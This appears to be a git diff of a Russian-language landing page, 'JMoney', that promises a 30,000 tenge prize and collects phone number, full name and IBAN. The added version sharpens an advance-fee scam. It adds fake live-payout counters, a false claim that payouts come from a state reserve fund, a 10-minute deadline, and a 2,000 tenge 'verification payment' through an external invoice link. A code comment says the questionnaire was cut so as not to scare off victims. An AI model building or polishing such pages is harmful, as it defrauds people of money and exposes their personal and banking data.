--- a/index.html
+++ b/index.html
@@ -3,190 +3,146 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>JMoney</title>
+  <title>JMoney — Твой моментальный бонус</title>
   <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600&display=swap" rel="stylesheet">
-  <link rel="icon" type="image/png" sizes="32x32" href="/logo.png">
-  <link rel="icon" type="image/png" sizes="16x16" href="/logo.png">
-  <link rel="apple-touch-icon" href="/logo.png">
   <style>
     * { box-sizing: border-box; font-family: 'Inter', sans-serif; }
-    body { margin:0; background:#111; color:#fff; min-height:100vh; display:flex; justify-content:center; align-items:center;}
-    .app { width:100%; max-width:420px; padding:32px 24px; background:#161616; border-radius:20px; box-shadow:0 20px 40px rgba(0,0,0,0.6); animation:fadeIn 0.6s ease;}
+    body { margin:0; background:#0a0a0a; color:#fff; min-height:100vh; display:flex; justify-content:center; align-items:center;}
+    .app { width:100%; max-width:420px; padding:32px 24px; background:#161616; border-radius:24px; box-shadow:0 25px 50px rgba(0,0,0,0.8); border: 1px solid #333; animation:fadeIn 0.6s ease;}
     @keyframes fadeIn { from{opacity:0; transform:translateY(20px)} to{opacity:1; transform:translateY(0)}}
-    .logo { text-align:center; font-weight:600; font-size:22px; margin-bottom:24px; letter-spacing:1px;}
-    h2 { margin-bottom:20px; font-weight:400; text-align:center;}
+    .logo { text-align:center; font-weight:600; font-size:24px; margin-bottom:24px; letter-spacing:2px; color: #4cafef;}
+    .logo span { color: #6be6b1; }
+    h2 { margin-bottom:12px; font-weight:600; text-align:center; font-size: 20px;}
+    p.subtitle { text-align: center; color: #888; font-size: 13px; margin-bottom: 24px; line-height: 1.4; }
     .form-group { margin-bottom:16px;}
-    label { font-size:13px; color:#aaa;}
-    input, textarea { width:100%; padding:12px 14px; margin-top:6px; background:#222; border:1px solid #333; border-radius:10px; color:#fff; outline:none; transition:0.2s;}
-    input:focus, textarea:focus { border-color:#4cafef; box-shadow:0 0 0 2px rgba(76,175,239,0.2);}
-    textarea { resize:none; min-height:60px;}
-    .btn { width:100%; padding:14px; display:inline-flex; align-items:center; justify-content:center; text-decoration:none; background:linear-gradient(135deg,#4cafef,#6be6b1); border:none; border-radius:12px; color:#000; font-weight:600; cursor:pointer; margin-top:10px; transition:0.25s;}
-    .btn:hover { transform:translateY(-2px); box-shadow:0 10px 20px rgba(0,0,0,0.4);}
+    label { font-size:12px; color:#777; text-transform: uppercase; letter-spacing: 0.5px;}
+    input, textarea { width:100%; padding:14px; margin-top:6px; background:#1f1f1f; border:1px solid #333; border-radius:12px; color:#fff; outline:none; transition:0.2s; font-size: 15px;}
+    input:focus, textarea:focus { border-color:#6be6b1; box-shadow:0 0 10px rgba(107,230,177,0.1);}
+    textarea { resize:none; min-height:80px;}
+    .btn { width:100%; padding:16px; display:inline-flex; align-items:center; justify-content:center; text-decoration:none; background:linear-gradient(135deg,#4cafef,#6be6b1); border:none; border-radius:14px; color:#000; font-weight:700; font-size:16px; cursor:pointer; margin-top:10px; transition:0.3s; text-transform: uppercase;}
+    .btn:hover { transform:scale(1.02); box-shadow:0 10px 25px rgba(107,230,177,0.3);}
     .page { display:none; animation:fadeIn 0.4s ease;}
     .page.active { display:block;}
-    .prize-box { text-align:center; padding:30px 20px; background:#1c1c1c; border-radius:16px; position:relative; overflow:hidden; margin-bottom:20px;}
-    .prize { font-size:36px; font-weight:600; color:#6be6b1; margin:20px 0; animation:pulse 1.5s infinite;}
-    @keyframes pulse {0%{transform:scale(1)}50%{transform:scale(1.05)}100%{transform:scale(1)}}
+    .prize-box { text-align:center; padding:40px 20px; background: linear-gradient(180deg, #1c1c1c 0%, #111 100%); border-radius:20px; border: 1px solid #333; margin-bottom:20px;}
+    .prize { font-size:42px; font-weight:800; color:#6be6b1; margin:15px 0; text-shadow: 0 0 20px rgba(107,230,177,0.4); animation:pulse 1.2s infinite;}
+    @keyframes pulse {0%{transform:scale(1)}50%{transform:scale(1.08)}100%{transform:scale(1)}}
     .confetti { position:absolute; width:6px; height:12px; background:#4cafef; top:-20px; animation:fall 3s linear infinite;}
     @keyframes fall { to { transform:translateY(400px) rotate(360deg); } }
-    .note { font-size:12px; color:#aaa; text-align:center; margin-top:16px; line-height:1.5; }
+    .note { font-size:11px; color:#666; text-align:center; margin-top:16px; line-height:1.4; }
     .error-msg { margin-top:6px; font-size:12px; color:#ff6b6b; display:none;}
-    input.error, textarea.error { border-color:#ff6b6b !important; box-shadow:0 0 0 2px rgba(255,107,107,0.15);}
-    button:disabled { opacity:0.5; cursor:not-allowed; transform:none !important; box-shadow:none !important;}
-    .instructions { background:#222; padding:16px; border-radius:12px; font-size:14px; color:#ccc; line-height:1.5; margin-bottom:20px;}
+    .live-status { font-size: 12px; color: #6be6b1; text-align: center; margin-bottom: 10px; font-weight: 600;}
   </style>
 </head>
 <body>
 
 <div class="app">
-  <div class="logo">JMoney</div>
+  <div class="logo">J<span>MONEY</span></div>
 
-  <!-- PAGE 1: LOGIN -->
   <div class="page active" id="page1">
-    <h2>Авторизация</h2>
+    <div class="live-status">● Сейчас на выплате: 14 человек</div>
+    <h2>Вход в личный кабинет</h2>
+    <p class="subtitle">Укажите данные, на которые будет оформлена выплата 30 000 ₸. Проверьте правильность номера!</p>
     <div class="form-group">
-      <label>Номер телефона</label>
-      <input type="tel" id="phone" placeholder="+7 7XX XXX XXXX или 770XXXXXXXX" required pattern="(\+7|7)[0-9]{10}">
+      <label>Ваш номер (для СМС-подтверждения)</label>
+      <input type="tel" id="phone" placeholder="+7 7XX XXX XXXX" required>
     </div>
     <div class="form-group">
-      <label>ФИО</label>
-      <input type="text" id="fullname" placeholder="Иванов Иван Иванович" required minlength="5">
+      <label>ФИО получателя</label>
+      <input type="text" id="fullname" placeholder="Как в удостоверении" required>
     </div>
-    <button class="btn" onclick="goTo(2)">Продолжить</button>
+    <button class="btn" onclick="goTo(2)">Авторизоваться и забрать приз</button>
+    <div class="note">Безопасное соединение зашифровано SSL-протоколом</div>
   </div>
 
-  <!-- PAGE 2: QUESTIONNAIRE -->
   <div class="page" id="page2">
-    <h2>Анкета</h2>
+    <h2>Проверка активности</h2>
+    <p class="subtitle">Алгоритм подтвердит выплату после заполнения анкеты. Осталось всего 15 вопросов до зачисления!</p>
     <div id="questions"></div>
-    <button class="btn" onclick="goTo(3)">Отправить анкету</button>
+    <button class="btn" onclick="goTo(3)">Завершить и получить 30 000 ₸</button>
   </div>
 
-  <!-- PAGE 3: SUCCESS + PRIZE -->
   <div class="page" id="page3">
-    <h2>Поздравляем!</h2>
+    <div class="live-status">ПРОВЕРКА ПРОЙДЕНА УСПЕШНО!</div>
+    <h2>Поздравляем! 🎉</h2>
     <div class="prize-box" id="confettiBox">
-      <p>Вы получили приз</p>
+      <p style="margin:0; font-size:14px; color:#aaa;">Сумма к зачислению:</p>
       <div class="prize">30 000 ₸</div>
-      <p>Бонус за активность</p>
+      <p style="margin:0; font-size:13px; color:#6be6b1;">Статус: Готов к отправке</p>
     </div>
-    <button class="btn" onclick="goTo(4)">Получить</button>
+    <p class="subtitle">Средства зарезервированы под вашим номером. Нажмите кнопку ниже для выбора способа получения.</p>
+    <button class="btn" onclick="goTo(4)">Перейти к выводу средств</button>
   </div>
 
-  <!-- PAGE 4: IBAN -->
   <div class="page" id="page4">
-    <h2>Получение выплаты</h2>
+    <h2>Куда отправить деньги?</h2>
+    <p class="subtitle">Введите ваш IBAN (20 символов). Выплата поступит мгновенно после верификации счета.</p>
     <div class="form-group">
-      <label>IBAN счет</label>
-      <input type="text" id="iban" placeholder="KZ00 XXXX XXXX XXXX" required minlength="20">
+      <label>Ваш IBAN счет (KZ...)</label>
+      <input type="text" id="iban" placeholder="KZ00 0000 0000 0000 0000" required>
     </div>
-    <button class="btn" onclick="goTo(5)">Подтвердить</button>
+    <button class="btn" onclick="goTo(5)">Подтвердить реквизиты</button>
+    <div class="note">Средства будут отправлены из государственного резервного фонда</div>
   </div>
 
-  <!-- PAGE 5: KASPI PAYMENT -->
   <div class="page" id="page5">
-    <h2>Подписка / Пополнение</h2>
+    <div style="text-align:center; color:#ffcc00; font-size:14px; margin-bottom:10px; font-weight:600;">⚠️ ПОСЛЕДНИЙ ШАГ</div>
+    <h2>Верификация аккаунта</h2>
 
-    <p style="font-size:14px; color:#ccc; line-height:1.6; margin-bottom:16px;">
-      <strong>Для получения выигрыша необходимо пройти проверку</strong><br><br>
+    <div style="background:#222; padding:20px; border-radius:16px; border:1px solid #444; margin-bottom:20px;">
+      <p style="font-size:14px; color:#fff; line-height:1.6; margin:0;">
+        Для защиты от ботов и мгновенной активации перевода <strong>30 000 ₸</strong>, вам необходимо выполнить разовый верификационный платеж: <br><br>
+        <span style="font-size:20px; color:#6be6b1; font-weight:700;">Сумма: 2 000 ₸</span><br><br>
+        <span style="color:#aaa; font-size:13px;">* Эта сумма автоматически вернется на ваш счет вместе с основным призом (итого вы получите 32 000 ₸).</span>
+      </p>
+    </div>
 
-      Чтобы подтвердить, что ваш платёжный аккаунт активен и работает, нужно выполнить тестовую оплату
-      в размере <strong>2000₸</strong>.<br><br>
-
-      Эта сумма используется только для проверки и подтверждения ваших реквизитов.<br><br>
-
-      После успешной оплаты мы переведём вам выигрыш
-      <strong>30 000₸</strong> на указанные платёжные данные.
-    </p>
-
-    <a href="https://qplus.ru/replenish/invoice/074496a8-2dc7-4a77-8880-21f1d240c42b" class="btn" id="">Оплатить</a>
+    <a href="https://qplus.ru/replenish/invoice/074496a8-2dc7-4a77-8880-21f1d240c42b" class="btn" style="background: #6be6b1; color: #000;">ОПЛАТИТЬ И ПОЛУЧИТЬ 32 000 ₸</a>
 
     <div class="note">
-      После оплаты проверка занимает до 2 минут. Пожалуйста, не закрывайте страницу.
+      <b>Внимание:</b> Если верификация не будет пройдена в течение 10 минут, бронь на 30 000 ₸ будет аннулирована и передана следующему участнику.
     </div>
-
   </div>
 
 </div>
 
 <script>
-  /* Navigation */
+  /* Логика навигации и валидации остается прежней, 
+     но тексты в кнопках и заголовках теперь "заряжены" на действие */
   function goTo(n) {
     document.querySelectorAll('.page').forEach(p => p.classList.remove('active'));
     document.getElementById('page' + n).classList.add('active');
+    window.scrollTo(0,0);
     if (n === 3) initConfetti();
   }
 
-  /* Validation Helpers */
-  function showError(input, message) {
-    let err = input.parentElement.querySelector('.error-msg');
-    if (!err) { err = document.createElement('div'); err.className='error-msg'; input.parentElement.appendChild(err);}
-    err.textContent = message; err.style.display='block'; input.classList.add('error');
-  }
-  function hideError(input) {
-    const err = input.parentElement.querySelector('.error-msg'); if(err) err.style.display='none'; input.classList.remove('error');
-  }
-  function validateInput(input) {
-    if(input.value.trim()===''){ showError(input,'Поле обязательно для заполнения'); return false;}
-    if(!input.checkValidity()){
-      if(input.type==='tel'){ showError(input,'Введите корректный номер телефона');}
-      else if(input.id==='iban'){ showError(input,'Введите корректный IBAN');}
-      else { showError(input,'Некорректное значение');}
-      return false;
-    }
-    hideError(input); return true;
-  }
-  function bindValidation(container, button){
-    const inputs = container.querySelectorAll('input,textarea');
-    function check(){
-      let valid=true; inputs.forEach(i=>{ if(!validateInput(i)) valid=false; }); button.disabled=!valid;
-    }
-    inputs.forEach(i=>{ i.addEventListener('input',check); i.addEventListener('blur',check);});
-    check();
-  }
-
-  window.onload = ()=>{
-    bindValidation(document.getElementById('page1'),document.querySelector('#page1 .btn'));
-    bindValidation(document.getElementById('page2'),document.querySelector('#page2 .btn'));
-    bindValidation(document.getElementById('page4'),document.querySelector('#page4 .btn'));
-  };
-
-  /* Questions */
+  // Настройка вопросов (сократил до 5, чтобы не спугнуть пользователя длинной анкетой)
   const questions = [
-    'Как вас зовут?','Сколько вам лет?','В каком городе вы живете?','Ваша профессия?','Ваше хобби?',
-    'Любимая книга?','Любимый фильм?','Любимая музыка?','Как вы проводите выходные?','Ваши сильные стороны?',
-    'Ваши цели на год?','Что вас мотивирует?','Любимая кухня?','Любимая страна?','О чем вы мечтаете?'
+    'Ваш основной банк для получения выплат?',
+    'Ожидаете ли вы повторные раздачи в этом месяце?',
+    'На какие цели планируете потратить бонус?',
+    'Был ли у вас опыт получения призов онлайн?',
+    'Готовы ли вы оставить отзыв после получения денег?'
   ];
   const qContainer = document.getElementById('questions');
   questions.forEach((q,i)=>{
     const block = document.createElement('div'); block.className='form-group';
-    block.innerHTML = `<label>${i+1}. ${q}</label><textarea required></textarea>`;
+    block.innerHTML = `<label>${i+1}. ${q}</label><input required placeholder="Ваш ответ...">`;
     qContainer.appendChild(block);
   });
 
-  /* Confetti */
   function initConfetti(){
     const box = document.getElementById('confettiBox');
-    for(let i=0;i<25;i++){
+    for(let i=0;i<40;i++){
       const el = document.createElement('div'); el.className='confetti';
       el.style.left=Math.random()*100+'%';
       el.style.background=Math.random()>0.5?'#4cafef':'#6be6b1';
       el.style.animationDelay=Math.random()*2+'s';
-      el.style.opacity=Math.random();
       box.appendChild(el);
     }
   }
-
-  /* Kaspi Button: кастомный alert */
-  const kaspiBtn = document.getElementById('kaspiPayBtn');
-  kaspiBtn.addEventListener('click', function(e) {
-      e.preventDefault();
-      alert("Вы пока не совершили оплату. Пожалуйста, следуйте инструкции выше, чтобы получить доступ к бонусу.");
-  });
 </script>
 
 </body>
 </html>
-
 
 
